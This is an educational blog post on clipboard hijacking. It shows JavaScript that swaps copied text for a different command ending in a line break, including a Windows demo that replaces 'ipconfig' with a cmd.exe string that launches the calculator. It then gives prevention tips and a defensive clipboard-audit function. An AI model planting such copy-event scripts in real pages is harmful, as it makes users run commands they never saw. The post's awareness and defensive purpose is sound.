Clipboard Hijacking

Aryan Shrestha
Jan 7, 2024

Copying text to the clipboard can turn it into a security risk.

Many of us regularly copy and paste commands from various websites directly into a terminal. But is there a risk of being compromised through such copied content? Indeed, this practice can expose you to potential security breaches.

An attacker can embed a small piece of JavaScript in a page that shows what appears to be a reasonable command but, when the user copies it, places different, harmful code on the clipboard, as shown in the code below:

<script>
  // Adding an event listener to the element with the ID 'copy'
  document.getElementById('copy').addEventListener('copy', function(e) {
    // Intercepting the copy event

    // Overwriting the copied data with malicious code
    e.clipboardData.setData('text/plain', "malicious code \r\n");

    // Preventing the default copy behavior to ensure only the malicious code is copied
    e.preventDefault();
  });
</script>

This code snippet is intended to take over the clipboard functionality. When a user attempts to copy text from the element with the ID ‘copy,’ this script intercepts the action and replaces what the user intended to copy with a string containing “malicious code.”

An attacker can append \n or \r\n to the copied string to add a line break. When the text is pasted into a terminal, that line break is treated like pressing Enter, so the embedded code can execute automatically.

This type of attack is straightforward yet can cause significant harm. Let me explain how it operates:

Copy the command and paste it into the terminal, and here we go:

YOU HAVE BEEN HACKED

Windows:

Now let’s look at Windows. We’re searching for the cmd command that shows the IP address, and we find this site.

This site has the following script:

<p> How to get the IP Address in Windows: </p>
<code><p id='copy'>ipconfig</p></code>
<script>
  document.getElementById('copy').addEventListener('copy', function(e) {
    e.clipboardData.setData('text/plain',"cmd.exe /c calc.exe & for /l %x in (1, 1, 5) do echo YOU HAVE BEEN HACKED \r\n");
    e.preventDefault();
  });
</script>

Copy the command and paste into the cmd:

Boom! YOU HAVE BEEN HACKED

Ways to prevent this?

An attacker leads a user into copying and pasting commands or code into their terminal or console, often resulting in hazardous outcomes such as revealing sensitive information or granting the attacker access to the victim’s machine. This is particularly harmful because it takes advantage of the user’s trust and lack of awareness. Here are some measures to avoid becoming a victim of such attacks:

  1. Awareness and Education: Understanding the risks is the first step in prevention. It is important to understand that merely copying and pasting material from websites can be hazardous. Educate yourself and those around you about these types of attacks, as well as the need to double-check everything you copy and paste.
  2. Verify Before Execution: Always validate any command or script before running it, especially if it comes from an untrusted source. Understand the purpose of the command or script and look for any hidden code.
  3. Use Reliable Sources: Only use commands or code from well-known, trustworthy sources. Make sure that excerpts taken from forums, community contributions, or other online sources are credible.
  4. Disable Script Execution: In some circumstances, you can prevent scripts from untrusted sources from being executed. This can help prevent harmful code from being executed accidentally.
  5. Maintain Your Anti-Malware and Security Software: Keep your anti-malware and security software up to date. Some advanced security solutions can detect and block suspicious activity, such as that caused by a copy-paste attack.
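
One way to put "Verify Before Execution" into practice, as an added example that is not part of the original post: the function below compares the text a user selected with what actually landed on the clipboard and flags the line endings and command chaining that the demos above rely on. The names `auditClipboard` and `neutralize` and the finding labels are hypothetical, and the sample strings are constructed from the Windows demo on this page.

```javascript
// Added example: audit clipboard text before it reaches a shell.
// auditClipboard, neutralize and the finding names are hypothetical helpers.

// Constructed samples mirroring the Windows demo on this page.
const SAMPLE_VISIBLE = "ipconfig";
const SAMPLE_CLIPBOARD =
  "cmd.exe /c calc.exe & for /l %x in (1, 1, 5) do echo YOU HAVE BEEN HACKED \r\n";

function auditClipboard(visibleText, clipboardText) {
  const findings = [];
  // Compare content only: unify line endings and ignore outer whitespace.
  const norm = (s) => s.replace(/\r\n?/g, "\n").trim();

  // 1. What the user selected is not what landed on the clipboard.
  if (norm(visibleText) !== norm(clipboardText)) findings.push("content-mismatch");

  // 2. A trailing CR/LF acts as Enter when pasted, so the line runs at once.
  if (/[\r\n]\s*$/.test(clipboardText)) findings.push("trailing-newline");

  // 3. A line break before the end means several commands in one paste.
  if (/[\r\n]/.test(clipboardText.replace(/\s+$/, ""))) findings.push("embedded-newline");

  // 4. Other control characters (ESC, backspace, ...) can hide or rewrite text.
  if (/[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]/.test(clipboardText)) findings.push("control-character");

  // 5. Command chaining operators used by cmd.exe and POSIX shells.
  if (/&&|\|\||[&;|`]|\$\(/.test(clipboardText)) findings.push("command-chaining");

  return findings;
}

// Returns the text as a single line without control characters, so a paste
// cannot execute on its own and the user can read it before pressing Enter.
function neutralize(clipboardText) {
  return clipboardText
    .replace(/[\r\n]+/g, " ")
    .replace(/[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]/g, "")
    .trim();
}

console.log(auditClipboard(SAMPLE_VISIBLE, SAMPLE_CLIPBOARD));
console.log(neutralize(SAMPLE_CLIPBOARD));
```

An empty result does not prove a command is safe; it only means none of these specific tricks were found, so the command still has to be read and understood before it is run.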
